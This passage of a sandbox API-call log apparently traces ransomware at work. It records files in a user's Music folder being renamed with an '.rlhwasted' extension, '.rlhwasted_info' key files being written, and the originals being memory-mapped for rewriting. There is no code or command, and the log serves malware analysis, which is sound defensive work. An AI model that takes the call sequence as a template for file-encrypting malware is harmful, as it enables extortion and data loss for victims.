(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\uDi71Sc.wav.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\udi71sc.wav.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0194.650] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0194.650] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x4ca8 [0194.651] MapViewOfFile (hFileMappingObject=0x108, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4ca8) returned 0x6a0000 [0194.651] CloseHandle (hObject=0x10c) returned 1 [0194.657] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f4f98) returned 1 [0194.658] CryptGenRandom (in: hProv=0x6f4f98, dwLen=0x1b8, pbBuffer=0x6e8c38 | out: pbBuffer=0x6e8c38) returned 1 [0194.658] CryptReleaseContext (hProv=0x6f4f98, dwFlags=0x0) returned 1 [0194.658] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f4f98) returned 1 [0194.659] CryptGenRandom (in: hProv=0x6f4f98, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0194.659] CryptReleaseContext (hProv=0x6f4f98, dwFlags=0x0) returned 1 [0194.671] SetEndOfFile (hFile=0x128) returned 1 [0194.674] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0194.674] CloseHandle (hObject=0x128) returned 1 [0194.676] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0194.676] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ee900 | out: hHeap=0x6b0000) returned 1 [0194.676] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f4f98) returned 1 [0194.677] CryptGenRandom (in: hProv=0x6f4f98, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0194.678] CryptReleaseContext (hProv=0x6f4f98, dwFlags=0x0) returned 1 [0194.678] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\8qw_yHR38T2G.mp3") returned 75 [0194.678] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2a0) returned 0x6e8978 [0194.678] lstrcpyW (in: lpString1=0x6e8a0e, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0194.678] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0194.678] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f4f98) returned 1 [0194.679] CryptGenRandom (in: hProv=0x6f4f98, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0194.679] CryptReleaseContext (hProv=0x6f4f98, dwFlags=0x0) returned 1 [0194.679] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\8qw_yHR38T2G.mp3.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\8qw_yhr38t2g.mp3.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0194.680] WriteFile (in: hFile=0x128, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0194.681] SetEndOfFile (hFile=0x128) returned 1 [0194.681] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0194.681] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0194.681] lstrcpyW (in: lpString1=0x6e8a0e, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0194.682] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\8qw_yHR38T2G.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\8qw_yhr38t2g.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\8qw_yHR38T2G.mp3.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\8qw_yhr38t2g.mp3.rlhwasted")) returned 1 [0194.683] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\8qw_yHR38T2G.mp3.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\8qw_yhr38t2g.mp3.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0194.683] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0194.683] GetFileSize (in: hFile=0x108, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0xdc93 [0194.683] MapViewOfFile (hFileMappingObject=0x10c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xdc93) returned 0x6a0000 [0194.683] CloseHandle (hObject=0x108) returned 1 [0194.736] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f4f10) returned 1 [0194.737] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0194.737] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0194.737] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f4f10) returned 1 [0194.738] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0194.738] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0194.750] SetEndOfFile (hFile=0x128) returned 1 [0194.753] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0194.753] CloseHandle (hObject=0x128) returned 1 [0194.759] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0194.759] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x708ca0 | out: hHeap=0x6b0000) returned 1 [0194.760] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f4f10) returned 1 [0194.761] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0194.761] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0194.761] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\FOc-OgJT3C\\1Q3nWg5Up7836h7E7SOQ.mp3") returned 94 [0194.761] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2c6) returned 0x6d5420 [0194.761] lstrcpyW (in: lpString1=0x6d54dc, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0194.761] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0194.761] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f4f10) returned 1 [0194.762] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0194.762] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0194.762] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\FOc-OgJT3C\\1Q3nWg5Up7836h7E7SOQ.mp3.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\foc-ogjt3c\\1q3nwg5up7836h7e7soq.mp3.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0194.763] WriteFile (in: hFile=0x128, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0194.764] SetEndOfFile (hFile=0x128) returned 1 [0194.764] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0194.764] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0194.764] lstrcpyW (in: lpString1=0x6d54dc, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0194.765] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\FOc-OgJT3C\\1Q3nWg5Up7836h7E7SOQ.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\foc-ogjt3c\\1q3nwg5up7836h7e7soq.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\FOc-OgJT3C\\1Q3nWg5Up7836h7E7SOQ.mp3.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\foc-ogjt3c\\1q3nwg5up7836h7e7soq.mp3.rlhwasted")) returned 1 [0194.766] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\FOc-OgJT3C\\1Q3nWg5Up7836h7E7SOQ.mp3.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\foc-ogjt3c\\1q3nwg5up7836h7e7soq.mp3.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0194.766] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0194.766] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x12a84 [0194.766] MapViewOfFile (hFileMappingObject=0x108, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12a84) returned 0xb00000 [0194.766] CloseHandle (hObject=0x10c) returned 1 [0194.972] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f4f98) returned 1 [0194.974] CryptGenRandom (in: hProv=0x6f4f98, dwLen=0x1b8, pbBuffer=0x6d45c8 | out: pbBuffer=0x6d45c8) returned 1 [0194.974] CryptReleaseContext (hProv=0x6f4f98, dwFlags=0x0) returned 1 [0194.974] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f4f98) returned 1 [0194.975] CryptGenRandom (in: hProv=0x6f4f98, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0194.975] CryptReleaseContext (hProv=0x6f4f98, dwFlags=0x0) returned 1 [0194.987] SetEndOfFile (hFile=0x128) returned 1 [0194.990] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0194.990] CloseHandle (hObject=0x128) returned 1 [0194.992] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d5420 | out: hHeap=0x6b0000) returned 1 [0194.992] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x70a100 | out: hHeap=0x6b0000) returned 1 [0194.992] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f4f98) returned 1 [0194.993] CryptGenRandom (in: hProv=0x6f4f98, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0194.993] CryptReleaseContext (hProv=0x6f4f98, dwFlags=0x0) returned 1 [0194.993] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\FOc-OgJT3C\\e6eC.wav") returned 78 [0194.994] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2a6) returned 0x6d4580 [0194.994] lstrcpyW (in: lpString1=0x6d461c, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0194.994] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0194.994] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f4f98) returned 1 [0194.995] CryptGenRandom (in: hProv=0x6f4f98, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0194.995] CryptReleaseContext (hProv=0x6f4f98, dwFlags=0x0) returned 1 [0194.995] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\FOc-OgJT3C\\e6eC.wav.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\foc-ogjt3c\\e6ec.wav.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0194.995] WriteFile (in: hFile=0x128, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0194.997] SetEndOfFile (hFile=0x128) returned 1 [0194.997] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0194.997] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0194.997] lstrcpyW (in: lpString1=0x6d461c, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0194.997] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\FOc-OgJT3C\\e6eC.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\foc-ogjt3c\\e6ec.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\FOc-OgJT3C\\e6eC.wav.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\foc-ogjt3c\\e6ec.wav.rlhwasted")) returned 1 [0194.998] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\FOc-OgJT3C\\e6eC.wav.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\foc-ogjt3c\\e6ec.wav.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0194.998] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0194.998] GetFileSize (in: hFile=0x108, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x2a60 [0194.998] MapViewOfFile (hFileMappingObject=0x10c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2a60) returned 0x6a0000 [0194.998] CloseHandle (hObject=0x108) returned 1 [0195.001] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f4f98) returned 1 [0195.002] CryptGenRandom (in: hProv=0x6f4f98, dwLen=0x1b8, pbBuffer=0x70a010 | out: pbBuffer=0x70a010) returned 1 [0195.002] CryptReleaseContext (hProv=0x6f4f98, dwFlags=0x0) returned 1 [0195.002] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f4f98) returned 1 [0195.003] CryptGenRandom (in: hProv=0x6f4f98, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0195.003] CryptReleaseContext (hProv=0x6f4f98, dwFlags=0x0) returned 1 [0195.062] SetEndOfFile (hFile=0x128) returned 1 [0195.065] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6edd68 | out: hHeap=0x6b0000) returned 1 [0195.065] CloseHandle (hObject=0x128) returned 1 [0195.067] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0195.067] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fe728 | out: hHeap=0x6b0000) returned 1 [0195.067] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f4f10) returned 1 [0195.068] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0195.068] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0195.068] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\FOc-OgJT3C\\ziaYytwBpZjJ mjNixs.mp3") returned 93 [0195.068] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2c4) returned 0x6e8978 [0195.068] lstrcpyW (in: lpString1=0x6e8a32, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0195.068] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6edd68 [0195.068] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f4f10) returned 1 [0195.069] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6edd68 | out: pbBuffer=0x6edd68) returned 1 [0195.069] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0195.069] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\FOc-OgJT3C\\ziaYytwBpZjJ mjNixs.mp3.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\foc-ogjt3c\\ziayytwbpzjj mjnixs.mp3.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0195.091] WriteFile (in: hFile=0x128, lpBuffer=0x6edd68*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6edd68*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0195.092] SetEndOfFile (hFile=0x128) returned 1 [0195.092] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.092] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6edd68 | out: hHeap=0x6b0000) returned 1 [0195.092] lstrcpyW (in: lpString1=0x6e8a32, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0195.092] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\FOc-OgJT3C\\ziaYytwBpZjJ mjNixs.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\foc-ogjt3c\\ziayytwbpzjj mjnixs.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\FOc-OgJT3C\\ziaYytwBpZjJ mjNixs.mp3.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\foc-ogjt3c\\ziayytwbpzjj mjnixs.mp3.rlhwasted")) returned 1 [0195.093] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\FOc-OgJT3C\\ziaYytwBpZjJ mjNixs.mp3.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\foc-ogjt3c\\ziayytwbpzjj mjnixs.mp3.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0195.093] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x104 [0195.094] GetFileSize (in: hFile=0x12c, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x1825d [0195.094] MapViewOfFile (hFileMappingObject=0x104, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1825d) returned 0xb00000 [0195.094] CloseHandle (hObject=0x12c) returned 1 [0195.104] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f4f10) returned 1 [0195.105] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x70a010 | out: pbBuffer=0x70a010) returned 1 [0195.105] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0195.105] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f4f10) returned 1 [0195.106] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0195.106] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0195.117] SetEndOfFile (hFile=0x128) returned 1 [0195.152] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6edd68 | out: hHeap=0x6b0000) returned 1 [0195.152] CloseHandle (hObject=0x128) returned 1 [0195.155] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0195.155] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x70a648 | out: hHeap=0x6b0000) returned 1 [0195.155] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x710fe8) returned 1 [0195.156] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0195.156] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0195.156] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\KGOxrl.mp3") returned 69 [0195.156] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x294) returned 0x6d4580 [0195.156] lstrcpyW (in: lpString1=0x6d460a, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0195.156] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6edd68 [0195.156] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x710fe8) returned 1 [0195.157] CryptGenRandom (in: hProv=0x710fe8, dwLen=0xa34, pbBuffer=0x6edd68 | out: pbBuffer=0x6edd68) returned 1 [0195.157] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0195.157] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\KGOxrl.mp3.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\kgoxrl.mp3.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0195.158] WriteFile (in: hFile=0x128, lpBuffer=0x6edd68*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6edd68*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0195.159] SetEndOfFile (hFile=0x128) returned 1 [0195.160] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.160] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6edd68 | out: hHeap=0x6b0000) returned 1 [0195.160] lstrcpyW (in: lpString1=0x6d460a, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0195.160] MoveFileW 